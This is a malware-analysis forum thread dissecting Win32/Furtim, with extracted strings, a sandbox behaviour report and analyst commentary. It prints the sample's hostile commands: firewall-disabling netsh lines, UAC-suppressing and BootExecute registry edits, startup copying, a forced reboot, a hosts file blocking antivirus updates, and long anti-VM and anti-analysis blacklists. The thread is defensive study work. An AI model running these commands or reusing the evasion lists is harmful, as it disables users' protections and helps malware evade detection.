A forum for reverse engineering, OS internals and malware analysis 

Win32/Furtim

Forum for analysis and discussion about malware.

Re: Malware with heavy virtual machine and sandbox detection

 #28399  by EP_X0FF
 Mon Apr 25, 2016 11:45 am
Does it work for you? I mean on machine that would not match this huge blacklist and not under debug? So far I see also sort of antidebug with NtQueryInformationProcess(ProcessDebugPort) and encrypted and probably compressed payload embedded inside.
Code: Select all
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
WhZonUF
JEoPIXRDNr8EO2Pz5e2EuYkzkKPzux
@S)Cr
WdN1
m%LHP
$&Mt
LSjM
Y3eo
!l3?^
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
NetUserEnum
NetLocalGroupAddMembers
ABndis
Teefer2
SBFWIMCL
Bcfilter
Epfwndis
klim5
aswNdis
Avgfwfd
scfndis
NNSNAHS
NNSNAHSL
wsnf
SBFWIMCL
econceal
ABndis
Bdfndisf
nnetsec
netfilter
OAnet
VPCNetS2
kwflower
eset_epfwndis
kl_klim5
sw_aswNdis
gr_avgfwfd
nt_econceal
kwflowerDevice
KL_KLIM6
aswNdisFlt
PCTNdisLW
EFW_NdisLwFlt
ESET_EpfwLWF
ft_fortifilter
pwipf6
inspect
pwipf6mp
Fkndisf
pctNDIS
RusRoute
Yndisim
AVSNDISIM
PsLookupProcessByProcessId
PsReferencePrimaryToken
gSharedInfo
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
IsWow64Process
wstif.sys
bdsnm.sys
bdsflt.sys
ggc.sys
catflt.sys
wsnf.sys
llio.sys
mscank.sys
EMLTDI.SYS
vsdatant.sys
360Box.sys
360Box64.sys
360Camera.sys
360Camera64.sys
360SelfProtection.sys
360AntiHacker.sys
360AntiHacker64.sys
360AvFlt.sys
pctNdis.sys
pctNdisLW64.sys
360AvFlt.sys
360FsFlt.sys
K7Sentry.sys
K7FWFilt.sys
K7TdiHlp.sys
tpsec.sys
pwipf6.sys
mwfsmflt.sys
ProcObsrvesx.sys
bdfsfltr.sys
ffsmon.sys
fildds.sys
filmfd.sys
filppd.sys
kl1.sys
klif.sys
kltdi.sys
kneps.sys
klkbdflt.sys
klmouflt.sys
GDBehave.sys
GDNdisIc.sys
gdwfpcd64.sys
gdwfpcd32.sys
ABFLT.sys
aswMonFlt.sys
aswRvrt.sys
aswRdr2.sys
aswVmm.sys
aswNdisFlt.sys
aswSnx.sys
aswSP.sys
aswStm.sys
avnetflt.sys
avkmgr.sys
avipbb.sys
avgntflt.sys
EpfwLWF.sys
epfwwfp.sys
eamonm.sys
ehdrv.sys
epfw.sys
eelam.sys
Bfilter.sys
Bfmon.sys
Bhbase.sys
vmx_svga.sys
vmmouse.sys
xennet.sys
CaptureProcessMonitor.sys
CaptureRegistryMonitor.sys
CaptureFileMonitor.sys
CWSandboxWatchdogDri
VBoxVideo.sys
avgdiskx.sys
avgidsdriverlx.sys
avgtdix.sys
avgunivx.sys
econceal.sys
taskrun\bruta\kbruta.sys
taskrun\bruta\TBM.sys
Global\KLObj_mt_avp6syncbla-blalic
Realtek RTL8139 Family PCI Fast Ethernet NIC
Realtek RTL8139C+ Fast Ethernet NIC
VMware Accelerated AMD PCNet Adapter
Microsoft Virtual Machine Bus Network Adapter
Microsoft Hyper-V Network Adapter
Adaptador de red de bus de m?quina virtual de Microsoft
VMware Virtual Ethernet Adapter for VMnet8
VMware Virtual Ethernet Adapter for VMnet1
VirtualBox Host-Only Ethernet Adapter
GetDC
TrackPopupMenu
CreatePopupMenu
SetWindowsHookExW
UnhookWindowsHook
SetWindowsHookExA
CallNextHookEx
FindWindowExW
GetWindowTextW
CreateWindowExW
CreateWindowExA
DefWindowProcW
LoadIconW
PostMessageA
DefWindowProcW
SetWindowLongW
CloseWindow
InsertMenuItemW
RegisterClassExW
RegisterClassA
DestroyMenu
InsertMenuItemA
EndMenu
ReleaseDC
UnregisterClassW
GetCursorPos
TranslateMessage
DispatchMessageW
GetMessageW
apispy.exe
autoruns.exe
autorunsc.exe
dumpcap.exe
emul.exe
fortitracer.exe
hookanaapp.exe
hookexplorer.exe
idag.exe
idaq.exe
importrec.exe
imul.exe
joeboxcontrol.exe
joeboxserver.exe
multi_pot.exe
ollydbg.exe
peid.exe
petools.exe
proc_analyzer.exe
procexp.exe
procmon.exe
regmon.exe
scktool.exe
sniff_hit.exe
sysanalyzer.exe
vmsrvc.exe
vmtoolsd.exe
vmusrvc.exe
vmwaretray.exe
vmwareuser.exe
wireshark.exe
xenservice.exe
pythonw.exeprl_tools.exe
FakeHTTPServer.exe
BehaviorDumper.exe
SbieSvc.exe
guninraik.exe
vboxservice.exe
vboxtray.exe
wine_get_unix_file_name
LoadLibraryW
LoadLibraryExA
QueryFullProcessImageNameW
GetSystemFirmwareTable
EnumSystemFirmwareTables
GetSystemDirectoryA
GetSystemDirectoryW
GetSystemWindowsDirectoryW
CreateProcessW
CreateProcessA
GetTempPathW
GetTempFileNameW
SetDllDirectoryW
LookupAccountSidW
RegSetValueExW
RegCreateKeyExW
RegCloseKey
AddAce
InitializeSid
InitializeAcl
GetSidLengthRequired
ConvertSidToStringSidW
CreateWellKnownSid
CheckTokenMembership
InitializeSecurityDescriptor
SetSecurityDescriptorDacl
GetNamedSecurityInfoW
SetNamedSecurityInfoW
GetUserNameW
RevertToSelf
CryptAcquireContextW
CryptReleaseContext
CryptCreateHash
CryptHashData
CryptGetHashParam
CryptDestroyHash
CheckSumMappedFile
GetAdaptersInfo
GetIpForwardTable
DeleteIpForwardEntry
OLE32.DLL
USER32.DLL
CoInitializeSecurity
CoInitializeEx
CoUninitialize
CoCreateInstance
IIDFromString
KernelBase.dll
CreateWellKnownSid
CheckTokenMembership
Direct3DCreate9
NtClose
NtAdjustPrivilegesToken
NtEnumerateKey
NtQuerySystemInformation
NtFlushKey
RtlGetFullPathName_U
RtlGetAce
RtlIdentifierAuthoritySid
RtlSubAuthorityCountSid
NtQueryInformationProcess
RtlAnsiStringToUnicodeString
RtlInitAnsiString
NtSetInformationThread
RtlSubAuthoritySid
RtlCompareUnicodeString
RtlRandomEx
RtlFreeUnicodeString
RtlValidSid
NtCreateKey
NtOpenFile
NtDelayExecution
NtDeleteFile
NtFlushBuffersFile
RtlComputeCrc32
NtClose
NtWriteFile
NtCreateFile
RtlInitUnicodeString
NtReadFile
RtlAddVectoredExceptionHandler
RtlGetVersion
NtOpenKey
NtOpenProcessToken
NtShutdownSystem
NtAllocateVirtualMemory
NtQueryInformationToken
RtlCreateSecurityDescriptor
RtlSetDaclSecurityDescriptor
NtSetSecurityObject
NtSetInformationFile
NtQueryInformationFile
NtSetValueKey
NtQueryValueKey
NtDeleteKey
RtlDecompressBuffer
NtCreateSection
NtMapViewOfSection
NtUnmapViewOfSection
NtQueryAttributesFile
LdrGetDllHandle
NtOpenProcess
NtTerminateProcess
NtProtectVirtualMemory
wcsstr
wcscpy
wcscmp
strcmp
_wcsicmp
memset
wcsncpy
memcpy
wcscat
sprintf
swprintf
memchr
_ultow
strcpy
memcmp
_strlwr
strrchr
strncpy
strstr
Intel(R) Xeon(R) CPU
Common KVM processor
Common 32-bit KVM
Virtual CPU 
Intel Celeron_4x0 (Conroe/Merom Class Core 2)
Westmere E56xx/L56xx/X56xx (Nehalem-C)
Intel Core 2 Duo P9xxx (Penryn Class Core 2)
Intel Core i7 9xx (Nehalem Class Core i7)
Intel Xeon E312xx (Sandy Bridge)
AMD Opteron 240 (Gen 1 Class Opteron)
AMD Opteron 22xx (Gen 2 Class Opteron)
AMD Opteron 23xx (Gen 3 Class Opteron)
AMD Opteron 62xx class CPU
Intel CPU version 
VMwareVMware
XenVMMXenVMM
KVMKVMKVM
prl hyperv
Microsoft Hv
AMD Athlon(tm) 64 Processor 3200+
Intel(R) Core(TM) i7
Intel(R) Core(TM) i5
Intel(R) Core(TM) i3
Intel(R) Core(TM)2 Duo CPU
SHLWAPI.DLL
PathFindFileNameW
StrStrIA
StrStrIW
SHELL32.DLL
StrStrIA
StrStrIW
CommandLineToArgvW
SHGetFolderPathW
SHGetKnownFolderPath
ShellExecuteExW
SHCreateDirectoryExW
strlen
LdrGetProcedureAddress
NtTerminateProcess
KiFastSystemCall
ZwSetInformationProcess
wcslen
Kernel32.dll
USER32.DLL
6miMgbAsUII26dwutnli5q2pz5ViYz
kernel32
netapi32.dll
sNdisuio
RasPppoe
rspndr
lltdio
Tcpip
Tcpip6
PSched
Wanarpv6
RMCast
Wanarp
Ndisuio
RasPppoe
Tcpip
NdisWan
NdisWan
NdisWan
NdisWan
PSched
Tcpip6
Characteristics
ComponentId
ms_ndiswanipv6
ms_ndiswanip
ms_pschedmp
ms_l2tpminiport
ms_pptpminiport
ms_ndiswanbh
ms_pppoeminiport
ms_ptiminiport
*tunmp
\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Linkage
UpperBind
NETIMFLT010600
UpperBind
UpperBind
nFFFFFFFFFMainwindow3
FFFFFFFFFMainwindow
user32.dll
o\Registry\User\%s\Software\Policies\Microsoft\Windows\System
DisableCMD
%SystemRoot%
%SystemRoot%\system32\cmd.exe
%s %s
%s %s
\??\%s
ADD "%s" /f /v %s /t REG_MULTI_SZ /d "%s"
HKLM\
\Registry\Machine\
%%SystemRoot%%\system32\reg.exe %s
%SystemRoot%
%%SystemRoot%%\system32\wbem\wmic.exe process call create "%s"
%SystemRoot%\system32\reg.exe
%s\%s
%%SystemRoot%%\system32\timeout.exe %i & %%SystemRoot%%\system32\reg.exe
%%SystemRoot%%\system32\reg.exe
%%SystemRoot%%\system32\ping.exe 0.0.0.0 & %%SystemRoot%%\system32\reg.exe
\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class
\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class
%SystemRoot%
%%SystemRoot%%\system32\timeout.exe %i & 
%SystemRoot%
%%SystemRoot%%\system32\ping.exe 0.0.0.0 & 
S-%lu-
0x%02hx%02hx%02hx%02hx%02hx%02hx
-%lu
C:\Windows\Temp
\Temp
S-1-16-12288
\Registry\Machine\SYSTEM\CurrentControlSet\Control\Session Manager
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager
S-1-5-32-544
\??\%s
%s%s
\??\%s
%SystemRoot%\System32\attrib.exe
/B /Y "%s" "%s"
copy
%SystemRoot%\bootstat2.dat
%SystemRoot%\bootstat.dat
\??\%s\bootstat.dat
\??\%s\bootstat2.dat
"%s" %s
\Temp:1
\bsdlabel.txt
\bsdlabel.txt
debugger
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
%s%s
msiexec.exe
msiexec.exe
msiexec.exe
msiexec.exe
Global\
Global\
xxxxxx
SetupExecute
BootExecute
autocheck autochk *
TRAYICOS.EXE
escanmon.exe
autocheck autochk *
UpperBind
Avgfwfd
edevmon
LowerFilters
edevmon
UpperFilters
PCTCore
LowerFilters
PCTCore
UpperFilters
DwDevGuard
LowerFilters
kernel32
%SystemRoot%\system32\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v HideSCAHealth /t REG_DWORD /d 0x1
%SystemRoot%\system32\netsh.exe
%SystemRoot%\system32\netsh.exe
%SystemRoot%\system32\netsh.exe
xxxxxx1
xxxxxx2
%s\puntosw.exe
%SystemRoot%\system32\shutdown.exe
%SystemRoot%\system32\ping.exe 0.0.0.0 & 
%SystemRoot%\system32\timeout.exe 5 & 
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
copy /B /Y "%s" "%s\puntosw.exe"
%SystemRoot%\system32\wbem\wmic.exe
antonie
c:\downloads\
CAntony
c:\downloads\
QEMU_
VMware
Ven_Red_Hat&Prod_VirtIO
DiskVBOX
DiskVirtual
SystemBiosVersion
\Registry\Machine\HARDWARE\ACPI\DSDT\VBOX__\VBOXBIOS
\Registry\Machine\SYSTEM\CurrentControlSet\Enum\ACPI\Hyper_V_Gen_Counter_V1
\Registry\Machine\SYSTEM\CurrentControlSet\Enum\ACPI\XEN0000\0
\Registry\Machine\SYSTEM\CurrentControlSet\Enum\XENBUS\CLASS_VBD&REV_02
\Registry\Machine\HARDWARE\DESCRIPTION\System
BOCHS  - 1
VBOX   - 1
PRLS   - 1
VideoBiosVersion
VirtualBox
PROCEXPL
sysinternals
PROCMON_WINDOW_CLASS
sysinternals
Autoruns
sysinternals
TCPViewClass
sysinternals
TCPView - Sysinternals: www.sysinternals.com
File Monitor - Sysinternals: www.sysinternals.com
gdkWindowToplevel
Registry Monitor - Sysinternals: www.sysinternals.com
Wireshark
Process Monitor - Sysinternals: www.sysinternals.com
API_TRACE_MAIN
Wget [100%%] http://tristan.ssdcorp.net/guid
C:\Program Files\Wireshark\dumpcap.exe
C:\wireshark\dumpcap.exe
C:\SandCastle\tools\FakeServer.exe
C:\\Python27\\python.exe
start.bat - C:\Manual\auto.bat
Fortinet Sunbox
PEiD v0.95
Total Commander 7.0 - Ahnlab Inc.
ThunderRT6FormDC
Total Commander 6.53 - GRISOFT, s.r.o.
Total Commander 7.56a - Avira Soft
Total Commander 7.56a - ROKURA SRL
C:\strawberry\perl\bin\perl.exe
SysAnalyzer
TfrmMain
All-Seeing Eye
Afx:400000:b:10011:6:350167
TApplication
Malicious Code Monitor v1.7.6 For NT(x86) - (ariesike@naver.com)
Mouse Move - by RJL Software, Inc.
SmartSniff
SmartSniff
ConsoleWindowClass
VxStream Kernel Service Manager
\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Iris Network Traffic Analyzer
\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\InstallWatch Pro 2.5
\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SysAnalyzer_is1
Software\Mozilla
\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13BE68B1-7498-48AB-9D22-AD3AB6532531}
\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest Additions
\Registry\Machine\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest Additions
\Registry\Machine\SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_BEEF&SUBSYS_00000000&REV_00
\Registry\Machine\SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00
\Registry\Machine\SYSTEM\CurrentControlSet\Enum\PCI\VEN_5333&DEV_8811&SUBSYS_00000000&REV_00
\Registry\Machine\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1AB8&DEV_4005&SUBSYS_04001AB8&REV_00
\Registry\Machine\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1AB8&DEV_4000&SUBSYS_04001AB8&REV_00
\Registry\Machine\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1AB8&DEV_4006&SUBSYS_04061AB8&REV_00
\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{25AD16E5-F48B-4455-83D7-849D600475A4}
\Registry\Machine\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Iris Network Traffic Analyzer
\Registry\Machine\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SysAnalyzer_is1
%SystemRoot%
\Registry\Machine\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\InstallWatch Pro 2.5
\Registry\Machine\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{13BE68B1-7498-48AB-9D22-AD3AB6532531}
\Registry\Machine\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{25AD16E5-F48B-4455-83D7-849D600475A4}
%%SystemRoot%%\system32\rundll32.exe %s,DllRegisterServer
\SystemRoot\%s
perl.exe
python.exe
TiraniumGuard.exe
\oracle\product\
\OraHome_1\perl\
\dbhome_1\perl\bin
\ZKTeco\ZKAccess\
\oracle\FRHome_1\perl\
\Oracle\Middleware\
\SystemRoot\System32\cmd.exe
runas
%SystemRoot%\system32\cmd.exe
/C "%s"
/C "%s" uac
\??\%s
%s\%s
%s\SysWOW64
ADVAPI32.DLL
ADVAPI32.DLL
imagehlp.dll
IPHLPAPI.DLL
C:\Windows
OLE32.DLL
USER32.DLL
D3d9.dll
9.exe
%s.exe
%s:Zone.Identifier
\??\%s:Zone.Identifier
brbrb-d8fb22af1
jonathan-c561e0
avreview1-VMXP
vwinxp-maltest
avreview-VMSunbox
infected-system
C:\xxx\sample.exe
C:\sample.exe
C:\Shared\dum._vxe
C:\SniferFiles\sample.exe
C:\virus\virus.exe
C:\virus.exe
c:\sampel.exe
C:\setup.exe
C:\runme.exe
c:\VMRun\Zample.exe
c:\FILE.EXE
C:\run\temp.exe
c:\taskrun\samples\rtktst.exe.exe
c:\artifact.exe
C:\manual\sunbox.exe
C:\1.exe
malware.exe
\virus\
admin\downloads\samp1e_
sample_execution
mlwr_smpl.exe
C:\agent\agent.pyw
C:\sandbox\starter.exe
c:\ipf\BDCore_U.dll
C:\cwsandbox_manager
C:\cwsandbox
C:\Stuff\odbg110
C:\gfisandbox
C:\Virus Analysis
C:\iDEFENSE\SysAnalyzer
c:\gnu\bin
C:\SandCastle\tools
C:\cuckoo\dll
C:\MDS\WinDump.exe
C:\tsl\Raptorclient.exe
C:\guest_tools\start.bat
C:\tools\aswsnx\snxcmd.exe
C:\Winap\ckmon.pyw
c:\tools\decodezeus
c:\tools\aswsnx
C:\sandbox\starter.exe
C:\Kit\procexp.exe
c:\tracer\mdare32_0.sys
C:\tool\malmon
C:\Samples\102114\Completed
c:\vmremote\VmRemoteGuest.exe
d:\sandbox_svc.exe
Z:\VxStream
avcuf32.dll
BgAgent.dll
guard32.dll
wl_hook.dll
QOEHook.dll
a2hooks32.dll
C:\Windows\system32
LSHLWAPI.DLL
LSHELL32.DLL
dir_watch.dll
tracer.dll
SbieDll.dll
APIOverride.dll
NtHookEngine.dll
api_log.dll
LOG_API.DLL
LOG_API32.DLL
C:\Program Files\VMware\VMware Tools
C:\Program Files (x86)\VMware\VMware Tools
\Registry\Machine\SYSTEM\CurrentControlSet\Enum\IDE
\Registry\Machine\SYSTEM\CurrentControlSet\Enum\SCSI
%02hx
SetupExecute
Microsoft Enhanced RSA and AES Cryptographic Provider
5347373
autocheck autochk *
BootExecute
xxxxxx2
BootExecute
SetupExecute
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager
8564534
xxxxxx1
fixup
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager
7585643
runas
%SystemRoot%\system32\shutdown.exe
%SystemRoot%\system32\cmd.exe
/C "%s" fixup
\Registry\Machine\SYSTEM\CurrentControlSet\services\aswNdisFlt
\SystemRoot\VZT6nsdX.txt
\SystemRoot\F5Ws94kb.txt
\SystemRoot\PsfjH4KN.txt
USER32.DLL
FFFFFFFFFMainwindow10
snxhk.dll
system32\timeout.exe
health
%SystemRoot%\system32\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v HideSCAHealth /t REG_DWORD /d 0x1
elevation
%SystemRoot%\system32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /f /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0x0
%SystemRoot%\system32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /f /v PromptOnSecureDesktop /t REG_DWORD /d 0x0
"%s"

Re: Malware with heavy virtual machine and sandbox detection

 #28403  by EP_X0FF
 Mon Apr 25, 2016 12:50 pm
Nevermind my question, managed to get it work. Well it copy itself to autorun (with copy command), force windows reboot, after reboot payload mapped to explorer.exe via Shell_TrayWnd PowerLoader method.

More strings from payloads
Code: Select all
 .phtml  .php3   .phtm   .inc    .7z .cgi    .pl .doc    .rtf    .tpl    .rar    .pif    .db .log    ROGUE_START 6G…ckernel32.dll    advapi32.dll    user32.dll  ws2_32.dll  ntdll.dll   winsta.dll  shell32.dll wininet.dll urlmon.dll  nspr4.dll   ssl3.dll    winmm.dll   cabinet.dll opera.dll   Gdi32.dll   gdiplus.dll crypt32.dll Iphlpapi.dll    winspool.drv    odbc32.dll  comdlg32.dll    psapi.dll   shlwapi.dll version.dll Imagehlp.dll    ole32.dll   cryptdll.dll    s v c h o s t . e x e   - k   n e t s v c s     e x p l o r e r . e x e     i n d e x . h t m l     \ B a s e N a m e d O b j e c t s \ S h i m S h a r e d M e m o r y     \ B a s e N a m e d O b j e c t s \ w i n d o w s _ s h e l l _ g l o b a l _ c o u n t e r s   \ B a s e N a m e d O b j e c t s \ M S C T F . S h a r e d . S F M . M I H     \ B a s e N a m e d O b j e c t s \ M S C T F . S h a r e d . S F M . A M F     \ B a s e N a m e d O b j e c t s \ U r l Z o n e s S M _ A d m i n i s t r a t o r     \ B a s e N a m e d O b j e c t s \ U r l Z o n e s S M _ S Y S T E M   S y s W O W 6 4 \ e x p l o r e r . e x e   ntdll.dll   KiUserApcDispatcher _chkstk WriteProcessMemory  atan    inject32_event  CloseHandle MapViewOfFile   OpenFileMappingA    CreateThread    OutputDebugStringA  SetWindowLongA  inject32_section    kernel32.dll    user32.dll  Shell_TrayWnd   bktrue      ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/    lfgrfJD6    Microsoft Enhanced Cryptographic Provider v1.0  botuid  GDlet64E    wndsksi.inf pgcache BJB WINAPI  WINAPIV StCstSinglWnd   [CLASS:     [TEXT:  passw.plug  Scan1   USER    PASS    ftp://%s:%s@%s:%d   \ p i n g . e x e   \ i g x p d v 3 2 . d a t   \ i g x p g d 3 2 . d a t   \ s m s s . e x e   kp_svc_mt   kp_videoprocess uid GET /    HTTP/1.1
Accept: */* 
   Accept-Language: ru 
  UA-CPU: x86 
  Accept-Encoding: gzip, deflate 
   User-Agent:     
Host:     
Connection: Close


   desc    type    screen  Screen  .png    id  base    os  plist   /get/tra.html   id=%s&data=%s   POST %s HTTP/1.1
Host: %s
User-Agent: %s
Accept: text/html
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: %d

       GET %s HTTP/1.0
Host: %s
User-Agent: %s
Connection: close

    .xsi    .ksi    *.xsi   *.ksi   sdcabfile.cab   DSStor  cab type_name   brw username=   &password=  ?|POST: id  type    data    cc  :// ?   /   http    https   Windows 7   Windows 7 X64   Windows Server 2008 R2  Windows Server 2008 R2 X64  Windows Server 2008 X64 Windows Vista X64   Windows XP X64  Windows Server 2003 R2 X64  Windows 2003 X64    Windows Server 2008 Windows Vista   Windows XP  Windows 8.0 Windows 8.1 Windows 10  Windows 10 X64  Windows 8.0 X64 Windows 8.1 X64 Windows Server 2003 R2  Windows 2003    Windows 2000    SOFTWARE\Microsoft\Windows NT\CurrentVersion    DigitalProductId    InstallDate     RegId   IEFrame MozillaWindowClass  OperaWindowClass    Chrome_WidgetWin_0  %ALLUSERSPROFILE%   ExitProcess KERNEL32    %s %s   %s  BJB Shell_TrayWnd   IEFrame Global\ %bot_id%    %debug% application/x-javascript    application/javascript  application/xml application/xhtml+xml   application/octet-stream    BJB nullptr _BT_VER:1.3.0   PLUG_NAME                                                                                           http:// /cfg/   /pat/scrl.html  K8DFaGYUs83KF05T    \\.\PHYSICALDRIVE0  ControlSet001   ControlSet002   CurrentControlSet   system32\drivers\AСPI.sys   SYSTEM\ \services\ACPI  ImagePath   XqhPCRsztb3fWwNd    hstbmld.sgl bnk.list    nobnk.list  uid av  md5 file_name   md5 cfg \\.\pipe\   btpipes GET POST    HEAD    PUT DELETE  LINK    UNLINK  CONNECT OPTIONS PATCH   TRACE   HTTP/1.0    HTTP/1.1    no-cashe    Host    Referer Accept  User-Agent  Accept-Language Accept-Encoding Content-Type    Content-Length  Cookie  Proxy-Connection    Pragma  Range   Transfer-Encoding   Connection  Location    Accept-Ranges   Content-Range   Last-Modified   If-Modified-Since   If-None-Match   Cache-Control   Content-MD5     
  

    :   chunked no-store, no-cache, must-revalidate &   application/x-www-form-urlencoded   multipart/form-data; boundary=  Content-Disposition: form-data; name="  ; filename="    /   */* ru  close   Keep-Alive  HTTP/1. 
0

 bytes   ---------   --  Content-Type:   application/octet-stream    Content-Transfer-Encoding: binary   HTTP/   bytes=  N O D 3 2   i g n o r e   f i l e   ROGUE_END               uaxxb0B71866061CF630B0
Seems to be mix of malware trash from the Carberp source code and maybe Simda.

Exactly this -> https://github.com/hzeroo/Carberp/tree/ ... ource/BJWJ

Re: Malware with heavy virtual machine and sandbox detection

 #28404  by badmoles
 Mon Apr 25, 2016 12:55 pm
Lastline Analyst reports these behaviours:

Disable Stopping the Windows Security Center service
Disable Disabling installed firewalls (Microsoft)
Evasion Potentially malicious application/program
Evasion Trying to detect analysis virtual environment (BIOS detection)
Evasion Trying to detect analysis virtual environment (drivers detection)
Evasion Trying to detect analysis virtual environment (installed applications detection)
Stealth Hiding files in Alternative Data Stream
Autostart Registering with the session manager to autostart
Settings Adding a Windows Firewall exception
Autostart Registering for autostart using the Windows start menu
Disable Restarting machine execution by force
File Modifying executable in Windows directory
Network Enumerates network adaptor devices
Search Retrieving the user account name
Settings Collecting information about system modules (potential kernel compromise)

It fires off several command line instances too:
C:\WINDOWS\system32\cmd.exe /C C:\WINDOWS\system32\ping.exe 0.0.0.0 & copy /B /Y "C:\Documents and Settings\Miller\Local Settings\Temporary Internet Files\JLYFGD8N\bLY1H6XurfpL9SmEiVto.exe" "C:\Documents and Settings\Miller\Start Menu\Programs\Startup\puntosw.exe"
C:\WINDOWS\system32\cmd.exe /C "C:\Documents and Settings\Miller\Local Settings\Temporary Internet Files\JLYFGD8N\bLY1H6XurfpL9SmEiVto.exe" 1 2 3
"C:\Documents and Settings\Miller\Local Settings\Temporary Internet Files\JLYFGD8N\bLY1H6XurfpL9SmEiVto.exe" 1 2 3
C:\WINDOWS\system32\cmd.exe /C C:\WINDOWS\system32\reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /f /v BootExecute /t REG_MULTI_SZ /d "autocheck autochk *\0C:\WINDOWS\Temp:1\0"
C:\WINDOWS\system32\reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /f /v BootExecute /t REG_MULTI_SZ /d "autocheck autochk *\0C:\WINDOWS\Temp:1\0"
C:\WINDOWS\system32\reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /f /v SetupExecute /t REG_MULTI_SZ /d C:\WINDOWS\Temp:1\0
C:\WINDOWS\system32\cmd.exe /C C:\WINDOWS\System32\attrib.exe -H -S C:\WINDOWS\bootstat.dat
C:\WINDOWS\system32\cmd.exe /C copy /B /Y C:\WINDOWS\bootstat.dat C:\WINDOWS\bootstat2.dat
C:\Documents and Settings\Miller\Local Settings\Temporary Internet Files\JLYFGD8N\bLY1H6XurfpL9SmEiVto.exe health
C:\WINDOWS\system32\netsh.exe winsock reset
C:\WINDOWS\system32\cmd.exe /C C:\WINDOWS\system32\ping.exe 0.0.0.0 & C:\WINDOWS\system32\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v HideSCAHealth /t REG_DWORD /d 0x1
C:\WINDOWS\system32\netsh.exe firewall set opmode mode = DISABLE profile = ALL
C:\WINDOWS\system32\netsh.exe advfirewall set allprofiles state off
C:\WINDOWS\system32\shutdown.exe -r -t 1 -f

Certainly a busy little bug. :)

Re: Malware with heavy virtual machine and sandbox detection

 #28406  by EP_X0FF
 Mon Apr 25, 2016 1:06 pm
This malware heavily trashes shell context registry entries and IFEO, disallowing start of programs from it internal blacklist (autoruns.exe for example) + scans window titles against the same blacklist. Reminds me old fake av style.

Re: Malware with heavy virtual machine and sandbox detection

 #28413  by EP_X0FF
 Mon Apr 25, 2016 3:19 pm
puzzlex wrote:Wondering if they are this good programmers why not call ExitWindows to reboot instead of shutdown.exe... or executing attrib.exe instead of SetFileAttributes... :?
By the way, thanks guys!
Because it is likely trigger detect of anything (hips/sandbox).

Re: Malware with heavy virtual machine and sandbox detection

 #28418  by EP_X0FF
 Tue Apr 26, 2016 4:44 am
Additional blacklist from bootexecute application in attach. Also malware replace hosts file to prevent AV updates. All checks performed during low phase of Windows startup before userinit. Malware scans registry keys and files presence on disk. About 50% size of bootexecute application is a blacklist.

hosts data (malekal, bleepingcomputers, malware removal forums and AV update servers etc)
Code: Select all
0.0.0.0 www.gmer.net
0.0.0.0 www.yeabests.cc
0.0.0.0 bleepingcomputer.com
0.0.0.0 www.bleepingcomputer.com
0.0.0.0 malekal.com
0.0.0.0 www.malekal.com
0.0.0.0 accounts.comodo.com
0.0.0.0 activation.adtrustmedia.com
0.0.0.0 activation-v2.kaspersky.com
0.0.0.0 auth.ff.avast.com
0.0.0.0 avstats.avira.com
0.0.0.0 backup1.bullguard.com
0.0.0.0 buddy.bitdefender.com
0.0.0.0 c2.dev.drweb.com
0.0.0.0 antivirus.baidu.com
0.0.0.0 cdn.static.malwarebytes.org
0.0.0.0 csasmain.symantec.com
0.0.0.0 definitionsbd.lavasoft.com
0.0.0.0 dm.kaspersky-labs.com
0.0.0.0 dnsscan.shadowserver.org
0.0.0.0 download.bitdefender.com
0.0.0.0 download.bullguard.com
0.0.0.0 download.comodo.com
0.0.0.0 download.eset.com
0.0.0.0 download.geo.drweb.com
0.0.0.0 downloadnada.lavasoft.com
0.0.0.0 downloads.comodo.com
0.0.0.0 downloads.lavasoft.com
